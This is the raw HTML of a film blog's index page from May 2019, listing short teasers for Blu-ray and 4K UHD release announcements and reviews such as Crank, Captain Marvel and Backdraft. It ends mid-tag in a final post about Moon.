Blu-ray June 4th!"'> I&#8217;LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!</a></h3> <div class="entry-date"> May 14th, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-136746 size-full" style="margin-right: 10px;" title="I'LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!" src="http://whysoblu.com/wp-content/uploads/2019/05/Ill-Take-Your-Dead.jpg" alt="" width="160" height="160" />The new horror thriller I’ll Take Your Dead<a rel="nofollow"> </a>will be available to haunt your shelves come June 4, when Scream Factory releases it on Blu-ray&#x2122; and DVD. Directed by Chad Archibald (Bite, The Heretics), and starring Aidan Devine (A History of Violence, Suicide Squad), Ava Preston (DC’s Shazam!, The Kennedys), Jess Salgueiro(Workin’ Moms, Mary Kills People), and Ari Millen (Orphan Black, Rupture), the home entertainment release of I’ll Take Your Dead includes a behind-the-scenes featurette that takes a look at the production of the film along with cast and crew interviews, as well as a script-to-screen comparison piece, deleted scenes, and trailers. <a href="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/#more-136745" class="more-link">Continue reading &#8216;I&#8217;LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fill-take-dead-arrives-blu-ray-june-4th%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FIll-Take-Your-Dead.jpg&description=I%27LL%20TAKE%20YOUR%20DEAD%20Arrives%20On%20Blu-ray%20June%204th%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/" dc:identifier="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/" dc:title="I&#8217;LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!" trackback:ping="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/scream-factory/" rel="tag">Scream Factory</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/blu-ray-reviews/" rel="category tag">Blu-ray Reviews</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136712" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/crank-4k-uhd-blu-ray-review/" rel="bookmark" title='Permanent Link to "Crank (4K UHD Blu-ray Review)"'> Crank (4K UHD Blu-ray Review)</a></h3> <div class="entry-date"> May 13th, 2019 by Brian White </div> <p style="text-align: justify;"><i><img class="alignleft" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/03/Crank-4K-Announcement.jpg" alt="Crank 4K Review" width="160" height="160" />Crank</i> is fondly immortalized in my memories as one of the first elite Blu-ray titles that overwhelmingly wowed and showed off how razor sharp certain 1080p video footage could be.<span class="Apple-converted-space">  </span>I know we have come a long way since then with both 4K and 8K video sources and displays, but in the early days of HD (circa 2006) this was an absolute looker. <span class="Apple-converted-space">  </span>I fondly remember my eyes being dried out taking this in for the first time as I had never seen anything that chiseled before on my Sony 40” HDTV monitor at the time.<span class="Apple-converted-space">  </span>Wow!<span class="Apple-converted-space">  </span>This brings back so many memories, but honestly it was only 13 years ago not the lifetime I seem to be painting here.<span class="Apple-converted-space">  </span>That does warrant and raises the following question.<span class="Apple-converted-space">  </span>Since <i>Crank</i> was captured from a multitude of sources, some not even 1080p, how is this one going to look on the 4K Ultra HD Blu-ray format?<span class="Apple-converted-space">  </span>After we get through the Film 101 below that’s going to be the subject we tackle next.<span class="Apple-converted-space">  </span>So stay tuned and if you’re just here for the A/V specs, by all means jump down to it below. <a href="http://whysoblu.com/crank-4k-uhd-blu-ray-review/#more-136712" class="more-link">Continue reading &#8216;Crank (4K UHD Blu-ray Review)&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fcrank-4k-uhd-blu-ray-review%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F03%2FCrank-4K-Announcement.jpg&description=Crank%20%284K%20UHD%20Blu-ray%20Review%29" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/crank-4k-uhd-blu-ray-review/" dc:identifier="http://whysoblu.com/crank-4k-uhd-blu-ray-review/" dc:title="Crank (4K UHD Blu-ray Review)" trackback:ping="http://whysoblu.com/crank-4k-uhd-blu-ray-review/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/amy-smart/" rel="tag">Amy Smart</a>, <a href="http://whysoblu.com/tag/brian-taylor/" rel="tag">Brian Taylor</a>, <a href="http://whysoblu.com/tag/carlos-sanz/" rel="tag">Carlos Sanz</a>, <a href="http://whysoblu.com/tag/dwight-yoakam/" rel="tag">Dwight Yoakam</a>, <a href="http://whysoblu.com/tag/efren-ramirez/" rel="tag">Efren Ramirez</a>, <a href="http://whysoblu.com/tag/jason-statham/" rel="tag">Jason Statham</a>, <a href="http://whysoblu.com/tag/jose-pablo-cantillo/" rel="tag">Jose Pablo Cantillo</a>, <a href="http://whysoblu.com/tag/mark-neveldine/" rel="tag">Mark Neveldine</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/blu-ray-reviews/4k-uhd-blu-ray-review/" rel="category tag">4K UHD Blu-ray Review</a></span> <a href="http://whysoblu.com/crank-4k-uhd-blu-ray-review/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136707" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/" rel="bookmark" title='Permanent Link to "&#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!"'> &#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!</a></h3> <div class="entry-date"> May 13th, 2019 by Gerard Iribe </div> <p style="text-align: justify;"><img class="alignleft wp-image-136720 size-full" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/mail-3.jpg" alt="" width="160" height="160" />Screen legend Sylvester Stallone kicks this explosive action tale into high gear. After security expert Ray Breslin (Stallone) is hired to rescue the kidnapped daughter of a Hong Kong tech mogul from a formidable Latvian prison, Breslin’s girlfriend (Jaime King) is also captured. Now he and his team, which includes Dave Bautista and Curtis “50 Cent” Jackson, must pull off a deadly rescue mission to confront their sadistic foe and save the hostages before time runs out. <a href="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/#more-136707" class="more-link">Continue reading &#8216;&#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fescape-plan-extractors-blu-ray-dvd-july-2-2019%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2Fmail-3.jpg&description=%27Escape%20Plan%3A%20The%20Extractors%27%20on%20Blu-ray%20%26%20DVD%20July%202%2C%202019%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/" dc:identifier="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/" dc:title="&#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!" trackback:ping="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/curtis-50-cent-jackson/" rel="tag">Curtis "50 Cent" Jackson</a>, <a href="http://whysoblu.com/tag/daniel-bernhardt/" rel="tag">Daniel Bernhardt</a>, <a href="http://whysoblu.com/tag/dave-bautista/" rel="tag">Dave Bautista</a>, <a href="http://whysoblu.com/tag/devon-sawa/" rel="tag">Devon Sawa</a>, <a href="http://whysoblu.com/tag/jaime-king/" rel="tag">Jaime King</a>, <a href="http://whysoblu.com/tag/john-herzfeld/" rel="tag">John Herzfeld</a>, <a href="http://whysoblu.com/tag/sylvester-stallone/" rel="tag">Sylvester Stallone</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136700" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/" rel="bookmark" title='Permanent Link to "&#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!"'> &#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!</a></h3> <div class="entry-date"> May 10th, 2019 by Gerard Iribe </div> <p style="text-align: justify;"><a href="https://www.amazon.co.uk/gp/product/B07R933CF3?ie=UTF8&amp;tag=wsb08-21&amp;camp=1634&amp;linkCode=xm2&amp;creativeASIN=B07R933CF3"><img class="alignleft wp-image-136708 size-full" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/81QQ62Qu6JL._SL1500_-copy.jpg" alt="" width="160" height="160" /></a>When Marine Captain Bob Hyde (Bruce Dern) leaves for Vietnam, his wife Sally (Fonda) volunteers at a local hospital. There she meets Luke Martin (Voight), a former sergeant whose war injury has left him a paraplegic. Embittered with rage and filled with frustration, Luke finds new hope and confidence through his growing intimacy with Sally. The relationship transforms Sally s feelings about life, love and the horrors of war. And when, wounded and disillusioned, Sally s husband returns home, all three must grapple with the full impact of a brutal, distant war that has changed their lives forever. One of director Hal Ashby&#8217;s biggest hits (second only to <i>Shampoo</i>), The Masters of Cinema Series is proud to present <i>Coming Home</i> for the first time on Blu-ray in the UK.  <a href="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/#more-136700" class="more-link">Continue reading &#8216;&#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fcoming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2F81QQ62Qu6JL._SL1500_-copy.jpg&description=%27Coming%20Home%27%20%5BEureka%20Masters%20of%20Cinema%5D%20on%20Blu-ray%20%26%20DVD%20July%2015%2C%202019%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/" dc:identifier="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/" dc:title="&#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!" trackback:ping="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/bruce-dern/" rel="tag">Bruce Dern</a>, <a href="http://whysoblu.com/tag/hal-ashby/" rel="tag">Hal Ashby</a>, <a href="http://whysoblu.com/tag/jane-fonda/" rel="tag">Jane Fonda</a>, <a href="http://whysoblu.com/tag/jon-voight/" rel="tag">Jon Voight</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/eureka-masters-of-cinema/" rel="category tag">Eureka! Masters of Cinema</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136694" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/" rel="bookmark" title='Permanent Link to "&#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!"'> &#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!</a></h3> <div class="entry-date"> May 10th, 2019 by Gerard Iribe </div> <p style="text-align: justify;"><a href="https://www.amazon.co.uk/gp/product/B07RDRJBBV?ie=UTF8&amp;tag=wsb08-21&amp;camp=1634&amp;linkCode=xm2&amp;creativeASIN=B07RDRJBBV"><img class="alignleft wp-image-136701 size-full" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/81BjTulGCoL._SL1500_-copy.jpg" alt="" width="160" height="160" /></a>At the height of the Second World War, a battalion of German ships are safely docked at the &#8220;unassailable&#8221; port of Bordeaux. Newly promoted Major Stringer (José Ferrer, also behind the camera as director) has a unique idea send a team of commandos out in collapsible canoes, have them paddle seventy miles upriver in arduous conditions and blow up the German ships with limpet mines. Also starring Trevor Howard and Christopher Lee, The Cockleshell Heroes is the true story of one of the most daring raids in British military history, and Eureka Classics is proud to present the film in its worldwide debut on Blu-ray.  <a href="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/#more-136694" class="more-link">Continue reading &#8216;&#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fcockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2F81BjTulGCoL._SL1500_-copy.jpg&description=%27The%20Cockleshell%20Heroes%27%20%5BEureka%20Classics%5D%20on%20Blu-ray%20%26%20DVD%20July%2015%2C%202019%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/" dc:identifier="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/" dc:title="&#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!" trackback:ping="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/christopher-lee/" rel="tag">Christopher Lee</a>, <a href="http://whysoblu.com/tag/dora-bryan/" rel="tag">Dora Bryan</a>, <a href="http://whysoblu.com/tag/jose-ferrer/" rel="tag">Jose Ferrer</a>, <a href="http://whysoblu.com/tag/trevor-howard/" rel="tag">Trevor Howard</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/eureka-classics/" rel="category tag">Eureka Classics</a>,<a href="http://whysoblu.com/category/eureka-masters-of-cinema/" rel="category tag">Eureka! Masters of Cinema</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136692" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/" rel="bookmark" title='Permanent Link to "&#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!"'> &#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!</a></h3> <div class="entry-date"> May 10th, 2019 by Gerard Iribe </div> <p style="text-align: justify;"><a href="https://www.amazon.co.uk/gp/product/B07QXPPCLF?ie=UTF8&amp;tag=wsb08-21&amp;camp=1634&amp;linkCode=xm2&amp;creativeASIN=B07QXPPCLF"><img class="alignleft wp-image-136695 size-full" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/71dtACP5I0L._SL1500_-copy.jpg" alt="" width="160" height="160" /></a>In the Donbass, a region of Eastern Ukraine, a hybrid war takes place, involving an open armed conflict alongside killings and robberies on a mass scale perpetrated by separatist gangs. A journey through the Donbass unfolds as a chain of curious adventures, where the grotesque and drama are as intertwined as life and death. This is not a tale of one region, one country or one political system. It is about a world, lost in post-truth and fake identities. It is about each and every one of us. <a href="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/#more-136692" class="more-link">Continue reading &#8216;&#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fdonbass-montage-pictures-blu-ray-dvd-june-24-2019%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2F71dtACP5I0L._SL1500_-copy.jpg&description=%27Donbass%27%20%5BMontage%20Pictures%5D%20on%20Blu-ray%20%26%20DVD%20June%2024%2C%202019%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/" dc:identifier="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/" dc:title="&#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!" trackback:ping="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/arsen-bosenko/" rel="tag">Arsen Bosenko</a>, <a href="http://whysoblu.com/tag/nina-antonova/" rel="tag">Nina Antonova</a>, <a href="http://whysoblu.com/tag/sergei-loznitsa/" rel="tag">Sergei Loznitsa</a>, <a href="http://whysoblu.com/tag/valeriu-andriuta/" rel="tag">Valeriu Andriuta</a>, <a href="http://whysoblu.com/tag/valeriy-antonyuk/" rel="tag">Valeriy Antonyuk</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/eureka-masters-of-cinema/montage-pictures/" rel="category tag">Montage Pictures</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136687" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/" rel="bookmark" title='Permanent Link to "CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!"'> CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!</a></h3> <div class="entry-date"> May 9th, 2019 by Brandon Peters </div> <p class="yiv9917619698MsoNormal" style="text-align: justify;"><img class="alignleft wp-image-136688 size-full" style="margin-right: 10px;" title="CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!" src="http://whysoblu.com/wp-content/uploads/2019/05/Captain-Marvel.jpg" alt="" width="160" height="160" />At yesterday’s espnW Summit NYC, Marvel Studios hosted a “Captain Marvel” panel and revealed an all-new trailer and in-home release dates for its first female-led franchise film, centered on Carol Danvers a.k.a. Captain Marvel. The spectacular, 1990s-era Super Hero adventure, which electrified and inspired audiences worldwide and surpassed $1 billion in ticket sales, is available on Digital in HD and 4K Ultra HD&#x2122; and Movies Anywhere <b>May 28</b>, and lands on Blu-ray&#x2122; and Blu-ray 4K Ultra HD&#x2122; <b>June 11</b>. Arriving home with extensive line-up of extras detailing the development of this highly anticipated addition to the Marvel Cinematic Universe (MCU), “Captain Marvel” includes Featurettes that highlight the transformative journey of Brie Larson (Captain Marvel) and her character’s impact on audiences around the globe; the influence of Nick Fury (Samuel L. Jackson) on significant events within the MCU; the perfect pairing of directors Anna Boden &amp; Ryan Fleck; the ongoing conflict between the Skrulls and the Kree; and the raw talent behind the fetching feline named Goose. Viewers also gain access to six deleted scenes, director commentary, a gag reel loaded with funnies, flubs and Flerkens, and never-before-seen concept art and production photography.  <a href="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/#more-136687" class="more-link">Continue reading &#8216;CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fcaptain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FCaptain-Marvel.jpg&description=CAPTAIN%20MARVEL%20Dazzles%20On%20Glorious%204K%20Ultra-HD%20Blu-ray%20June%2011th%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/" dc:identifier="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/" dc:title="CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!" trackback:ping="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/ben-mendelsohn/" rel="tag">Ben Mendelsohn</a>, <a href="http://whysoblu.com/tag/brie-larson/" rel="tag">Brie Larson</a>, <a href="http://whysoblu.com/tag/samuel-l-jackson/" rel="tag">Samuel L. Jackson</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a>,<a href="http://whysoblu.com/category/news/trailer-news/" rel="category tag">Trailers</a></span> <a href="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136656" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/backdraft-4k-blu-ray-review/" rel="bookmark" title='Permanent Link to "Backdraft (4K Blu-Ray Review)"'> Backdraft (4K Blu-Ray Review)</a></h3> <div class="entry-date"> May 8th, 2019 by Adam Toroni-Byrne </div> <p style="text-align: justify;"><strong><em><img class="alignleft wp-image-136669 size-full" style="margin-right: 10px;" src="http://whysoblu.com/wp-content/uploads/2019/05/firstimage.jpg" alt="" width="160" height="160" />Backdraft </em></strong>has often been one of those movies for me that I forget about. For whatever reason, despite the fact that the film is engaging, well acted and steadfastly directed, I always sock it away somehow. The funniest part to me is that despite it going left of my attention a lot of the time, each time I revisit it I am reminded of the excellent story structure that balances drama, thriller and action, the strong cast (Kurt Russell, William Baldwin, Robert DeNiro, Jennifer Jason Leigh, Rebecca Demornay, Scott Glenn, Donald Sutherland and JT Walsh… phew, what a cast!) playing at their best and the lovingly crafted direction from Ron Howard.  This exceptional 4K Release has made it very hard to imagine me forgetting this fantastic movie until the next viewing though! Check out more about the movie below that hit stores May 7<sup>th</sup>! <a href="http://whysoblu.com/backdraft-4k-blu-ray-review/#more-136656" class="more-link">Continue reading &#8216;Backdraft (4K Blu-Ray Review)&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fbackdraft-4k-blu-ray-review%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2Ffirstimage.jpg&description=Backdraft%20%284K%20Blu-Ray%20Review%29" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/backdraft-4k-blu-ray-review/" dc:identifier="http://whysoblu.com/backdraft-4k-blu-ray-review/" dc:title="Backdraft (4K Blu-Ray Review)" trackback:ping="http://whysoblu.com/backdraft-4k-blu-ray-review/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/brian-grazer/" rel="tag">Brian Grazer</a>, <a href="http://whysoblu.com/tag/donald-sutherland/" rel="tag">Donald Sutherland</a>, <a href="http://whysoblu.com/tag/jennifer-jason-leigh/" rel="tag">Jennifer Jason Leigh</a>, <a href="http://whysoblu.com/tag/jt-walsh/" rel="tag">JT Walsh</a>, <a href="http://whysoblu.com/tag/kurt-russell/" rel="tag">Kurt Russell</a>, <a href="http://whysoblu.com/tag/rebecca-de-mornay/" rel="tag">Rebecca De Mornay</a>, <a href="http://whysoblu.com/tag/robert-deniro/" rel="tag">Robert DeNiro</a>, <a href="http://whysoblu.com/tag/ron-howard/" rel="tag">Ron Howard</a>, <a href="http://whysoblu.com/tag/scott-glenn/" rel="tag">Scott Glenn</a>, <a href="http://whysoblu.com/tag/william-baldwin/" rel="tag">William Baldwin</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/blu-ray-reviews/4k-uhd-blu-ray-review/" rel="category tag">4K UHD Blu-ray Review</a></span> <a href="http://whysoblu.com/backdraft-4k-blu-ray-review/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136665" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/" rel="bookmark" title='Permanent Link to "MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!"'> MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!</a></h3> <div class="entry-date"> May 7th, 2019 by Brandon Peters </div> <div dir="ltr"> <div class="yiv4216293391WordSection1"> <p class="yiv4216293391MsoNormal" style="text-align: justify;"><img class="alignleft wp-image-136666 size-full" 